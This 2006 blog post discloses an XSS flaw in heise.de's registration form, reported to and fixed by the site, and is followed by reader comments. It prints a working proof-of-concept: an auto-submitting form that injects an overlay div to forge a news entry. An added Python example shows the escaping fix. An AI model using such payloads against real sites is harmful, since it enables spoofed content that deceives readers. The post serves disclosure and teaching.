How-to fake heise news entries

morph3us.org

(Tuesday, September 5, 2006)
As I already mentioned in a previous blog posting titled "XSS on heise.de", there was an XSS vulnerability on heise.de. I informed heise's webmaster about this bug on December 23, 2005 and received a reply stating that the issue had been addressed on January 06, 2006. It's almost unbelievable that this bug is still present to this day.
Yesterday heise.de reported an XSS vulnerability on the German federal government's website that could be used to create forged news entries. Therefore I decided to use the bug on heise's own website to create my own heise news entry.

Heise Registration Forms
The XSS bug is located in heise's registration script: the values submitted in the form fields marked in the image are reflected into the page unescaped, so arbitrary markup can be injected right after those form elements.

Everything after the form elements can easily be commented out with an unterminated HTML comment, but how do we replace the text and elements above the form elements? In fact it is very easy: we define a new div element, positioned absolutely, that overlaps the original text.

Because the overlay uses relative (percentage) dimensions, the div does not cover the original text neatly if the browser window is resized; but this code is only a quick and dirty PoC.

<form method="post" action="http://www.heise.de/registration/" name="heise">
<input type="text" name="uid" size="20" value=''>
<input type="text" name="vorname" size="20" value='<div style="position:absolute; top:5%;left:12%; width:73%;height:120%; background:#fff;">[...]</div> <!--'>
<input type="text" name="name" size="20" value=''>
</form>
<body onload="heise.submit();">
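The root cause described above is a server-side script that reflects a submitted field value into its response without HTML encoding. The following Python stand-in is an added example, not heise's code or the original post's PoC: it renders a hypothetical registration response page once with raw reflection (the vulnerable pattern) and once with html.escape applied, then parses both results to show that the injected overlay div only becomes a DOM element in the unescaped version. The page layout, the field name vorname (taken from the PoC above) and the payload are constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed payload in the style of the post's PoC: an absolutely positioned
# overlay followed by an unterminated HTML comment that hides the rest of the page.
INJECTED_VORNAME = ('<div style="position:absolute; top:5%;left:12%; width:73%;'
                    ' background:#fff;">fake news</div> <!--')

# Hypothetical response page of a registration script (not heise's real markup).
# The submitted first name is reflected twice: in text and inside a value='...'
# attribute, which is the pattern the post exploits.
PAGE_TEMPLATE = (
    "<html><body>\n"
    "<h1>Registration</h1>\n"
    "<p>Welcome, {vorname}. Please check your data:</p>\n"
    "<form method=\"post\" action=\"/registration/\">\n"
    "<input type=\"text\" name=\"vorname\" size=\"20\" value='{vorname}'>\n"
    "<input type=\"submit\" value=\"Register\">\n"
    "</form>\n"
    "<p class=\"footer\">News ticker and navigation would follow here</p>\n"
    "</body></html>\n"
)


def render_unsafe(vorname: str) -> str:
    """Vulnerable pattern: the submitted value is reflected verbatim."""
    return PAGE_TEMPLATE.format(vorname=vorname)


def render_safe(vorname: str) -> str:
    """Fixed pattern: HTML-encode once before reflecting. quote=True also
    encodes ' and ", so the value cannot close the single-quoted attribute."""
    return PAGE_TEMPLATE.format(vorname=html.escape(vorname, quote=True))


class TagCounter(HTMLParser):
    """Counts start tags so a test can see whether user input changed the DOM."""

    def __init__(self) -> None:
        super().__init__()
        self.counts: dict[str, int] = {}

    def handle_starttag(self, tag, attrs):
        self.counts[tag] = self.counts.get(tag, 0) + 1


def count_tags(document: str) -> dict:
    parser = TagCounter()
    parser.feed(document)
    parser.close()
    return parser.counts


def reflection_is_safe(document: str) -> bool:
    """Regression check for the renderer: whatever the input, the page must
    still contain exactly one form and two inputs and no attacker-supplied div.
    Counting tags is a test aid only; production code should rely on a template
    engine's auto-escaping rather than on a check like this."""
    counts = count_tags(document)
    return (counts.get("div", 0) == 0
            and counts.get("form", 0) == 1
            and counts.get("input", 0) == 2)


if __name__ == "__main__":
    for label, page in (("unsafe", render_unsafe(INJECTED_VORNAME)),
                        ("safe", render_safe(INJECTED_VORNAME))):
        print(f"{label:6s} tags={count_tags(page)} ok={reflection_is_safe(page)}")
```

Running the script shows the unescaped page gaining a div element (and, depending on the parser, losing the form behind the unterminated comment), while the escaped page keeps its original structure because the payload is rendered as literal text. The same encoding step at every reflection point is the fix heise eventually applied, regardless of the language the registration script was written in.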


Complete Heise Fake News PoC code.

Heise Fake News


Update: 2006/09/06
I informed Heise about this vulnerability again and they fixed it immediately.
Comments

Don't trust the Austrians!!!!1111...

Thomas, an Austrian friend of mine, just sent me this information about an XSS weakness on heise.de, the German IT-Bildzeitung. Thomas tried to inform the webmasters of heise.de a few months ago … but nothing happened.
Yesterday heise.de reported...
#1 Domber's Basecamp (Homepage) on 2006-09-05 14:54 (Reply)
How to fake heise.de new entries...

Thomas Waldegger (aka morpheus) found an XSS vuln. on heise.de, which he already reported at the end of last year and which should have been fixed since the beginning of this year. Well, doesn't seem so. Read more here.
...
#2 Doomshammer's Weblog (Homepage) on 2006-09-05 17:19 (Reply)
Heise.de hacked ;)...

Hrhr, heise.de, which reported on the cross-scripting vulnerability on bundesregierung.de a few days before, got hacked itself.
Morph3us shows in his blog a simple proof-of-concept code which explains how you can add customized news on heise.de on y...
#3 blog.teranetworks.de (Homepage) on 2006-09-06 02:41 (Reply)
"It's hardly unbelievable"?
In any case, the problem is now really fixed.
#4 Webmaster (Homepage) on 2006-09-06 11:32 (Reply)
Thanks. I corrected the sentence.

btw: Google search: 'hardly unbelievable'

lol. (o:
#5 morpheus (Homepage) on 2006-09-16 16:08 (Reply)
[…] that an even bigger hole was found by the blogger at Morph3us.. smile More here => http://morph3us.org/blog/?p=41 Care to test? => […]
#6 [ andyrockt.com - the blog ] People who live in glass houses.. (Homepage) on 2007-03-23 22:47 (Reply)
